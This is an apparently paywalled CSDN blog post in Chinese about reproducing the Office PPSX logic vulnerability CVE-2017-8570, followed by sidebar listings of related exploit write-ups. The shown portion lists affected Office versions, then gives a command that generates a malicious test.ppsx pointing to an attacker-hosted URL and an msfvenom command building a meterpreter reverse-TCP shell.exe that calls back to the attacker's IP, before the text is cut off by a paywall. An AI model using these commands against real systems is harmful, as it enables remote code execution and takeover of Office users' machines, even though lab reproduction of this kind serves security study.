office ppsx逻辑漏洞(CVE-2017-8570)

最新推荐文章于 2023-11-14 17:14:29 发布
最新推荐文章于 2023-11-14 17:14:29 发布
阅读量323 收藏
点赞数
文章标签: shell 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40939785/article/details/113069137
版权

CVE-2017-8570影响office版本

Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)

一、使用exp:cve-2017-8570_toolkit.py

攻击机为192.168.43.141

目标机为192.168.43.128

攻击机:

python cve-2017-8570_toolkit.py -M gen -w test.ppsx -u http://192.168.43.141/a.doc //①

需要在exp目录下新建template文件夹,下有template.ppsx

生成test.ppsx,发送给目标机

攻击机:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.141 LPORT=4567 -f exe > shell.exe

mv

最低0.47元/天 解锁文章
Eumenides-Z
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Office CVE-2017-8570远程代码执行漏洞复现
看不尽的尘埃——博客
11-19 450
简介 CVE-2017-8570漏洞是利用复合Moniker绕过了CVE-2017-0199的补丁针对Script Moniker和URL Moniker相关classid的拦截。CVE-2017-8570是一个逻辑漏洞,和常规的内存破坏型漏洞不同,这类漏洞无需复杂的利用手法,直接就可以在office文档中运行任意的恶意脚本。 影响版本 复现环境 靶机:windows...
Office 远程代码执行漏洞(CVE-2017-8570)复现
zzgslh的博客
04-08 1155
【漏洞详情】 Office一直是主流的办公软件,当 Microsoft Office 软件无法正确处理内存中的对象时,其中存在远程执行代码漏洞。成功利用此漏洞的攻击者可以使用经特殊设计的文件在当前用户的安全上下文中执行操作。CVE-2017-8570这个漏洞影响office所有发行版本,当用户不经意点击了我们的恶意PPSX文件,那么我们就可以直接获取到他的用户权限,危害性十分高。 【验证详情】...
office漏洞汇总
好好学习,天天向上
03-06 225
https://www.cnblogs.com/diligenceday/p/7898839.htmlhttps://cloud.tencent.com/developer/news/200097 CVE-2017-11882 https://blog.csdn.net/darkhq/article/details/79134981 CVE-2018-0802 噩梦公式二代复现https://ww...
kali下CVE-2017-8570利用复现实验
我的学习笔记
02-28 1599
参考:https://www.youtube.com/watch?v=jUhmPH_u6gshttps://github.com/tezukanice/Office8570https://www.symantec.com/security_response/vulnerability.jsp?bid=99445https://www.rapid7.com...
CVE-2017-8570微软office漏洞复现与研究
qq_38352420的博客
06-30 706
title: CVE-2017-8570微软office漏洞复现与研究 date: 2019-02-01 23:47:44 CVE-2017-8570微软office漏洞复现与研究 微软office漏洞背景 微软Office系统软件(Word/Excel/PowerPoint等),一直是电脑上最为常用的办公软件之一,在国内外都拥有大量的用户。另一方面,利用Office系列软件的漏洞进行网络攻击已经成为黑客惯用的手段,广泛运用于APT攻击,抓肉鸡,传播勒索病毒等。其中一种典型的攻击方式是“鱼叉攻击”:黑客将.
ppsx-file-generator:用于CVE-2017-8570ppsx文件生成器(基于bhdreshcve-2017-8570
05-16
ppsx-file-generator是一个python工具,可生成PowerPoint幻灯片放映文件,该文件可根据现有文件从远程源执行代码。 它有什么作用? 该工具使用提供的输入生成幻灯片演示文件和xml文件。 Power Point文件访问保存...
大学计算机基础作业-参考.doc
11-19
本资源摘要信息主要涵盖了大学计算机基础作业的重要知识点,包括BIOS芯片、Windows 7操作系统、Microsoft Office 2010(Word、Excel、PowerPoint)等方面。 1. BIOS芯片:BIOS芯片是一组固化在ROM芯片上的程序,为...
8-1 螺纹.ppsx
03-08
8-1 螺纹.ppsx
add-convert-ppt-pptx-pps-ppsx-to-context-menu:直接从上下文菜单将pptx ppsx ppt pps转换为PDF的快速方法
03-08
将convert-ppt-pptx-pps-ppsx添加到上下文菜单 直接从上下文菜单直接将pptx ppsx ppt pps转换为PDF的快速方法此脚本很大程度上依赖于iBug的脚本,该脚本位于以下: : 将Convert_pptx_ppsx_ppt_to_PDF.vbs复制到您的...
语法微课-名词.ppsx
09-26
语法微课-名词.ppsx
Office发现4个安全漏洞,黑客可执行恶意代码
w3cschools的博客
06-09 1018
近日,国内网络安全组织东方联盟的研究人员在今天发布的一份报告中表示:“这些漏洞源于遗留代码,可能使攻击者能够通过 Word、Excel 和 Outlook 等恶意 Office 文档在目标上执行代码。” 四个漏洞中的三个——跟踪为 CVE-2021-31174、CVE-2021-31178、CVE-2021-31179——已被微软修复,作为其2021 年 5 月补丁星期二更新的一部分,第四个补丁 (CVE-2021 -31939) 将在今天晚些时候推出的 6 月更新中发布。 在 Microsoft
Office CVE-2017-8570漏洞复现
weixin_44283446的博客
12-20 2069
Office CVE-2017-8570漏洞复现说明描述漏洞影响版本环境说明漏洞复现参考 说明 本文仅供学习使用 描述 2017年7月,微软在例行的阅读补丁中修复了多个Microsoft Office漏洞,其中的CVE-2017-8570漏洞为一个逻辑漏洞。网上公布了利用代码,影响范围广泛。该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsof PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而
office漏洞 (CVE-2017-11882)复现
芥子
01-25 3691
在/usr/share/metasploit-framework/modules/exploits/windows/smb上传 cve_2017_1182.rb 在/usr/share/metasploit-framework/data/exploits上传cve-2017-1182.rtf文件 以上的文件准备好后即可用msf来进行操作 在搜索模块的时候出现以下错误
微软office远程代码执行漏洞(CVE-2017-11882)复现
GUINEW的博客
11-28 2173
微软office远程代码执行漏洞(CVE-2017-11882)复现 metasploit-framework koadic
CVE-2023-2766:泛微E-Office信息泄露漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
11-14 1640
Weaver E-Office 9.5版本存在configfile存在信息泄露。攻击者利用该漏洞可以访问文件或目录。
CVE-2017-8570漏洞利用
weixin_30267785的博客
12-19 235
CVE-2017-8570漏洞是一个逻辑漏洞,利用方法简单,影响范围广。由于该漏洞和三年前的SandWorm(沙虫)漏洞非常类似,因此我们称之为“沙虫”二代漏洞。 编号 CVE-2017-8570 影响版本 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit edition...
宏观视角下的office漏洞(2010-2018)
360技术
06-21 1040
奇技指南本文作者银雁冰:360高级威胁应对团队·高级威胁自动化组本文来自安全客,原文地址:https://www.anquanke.com/post/id/180067...
【kernel exploit】CVE-2019-9213 逻辑漏洞绕过 mmap_min_addr 限制
panhewu9919的博客
07-07 1254
影响版本:Linux-4.20.14以前(v4.20.14已修补) 5.5分。 测试版本:Linux-4.20.7 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory 编译选项: CONFIG_SLAB=y General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB 在编译时将.config中的CONFIG_E1000和
编辑好的PowerPoint2016演示文稿,以后只播放不编辑,可以进行的操作保存成什么后缀名的文件
06-08
当您编辑好 PowerPoint 2016 演示文稿并且只需要进行播放时,您可以将其...其中,您可以将演示文稿保存为 .ppsx 后缀名的文件,这是 PowerPoint 演示文稿放映文件的默认后缀名,也是用于播放演示文稿的最常用的后缀名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值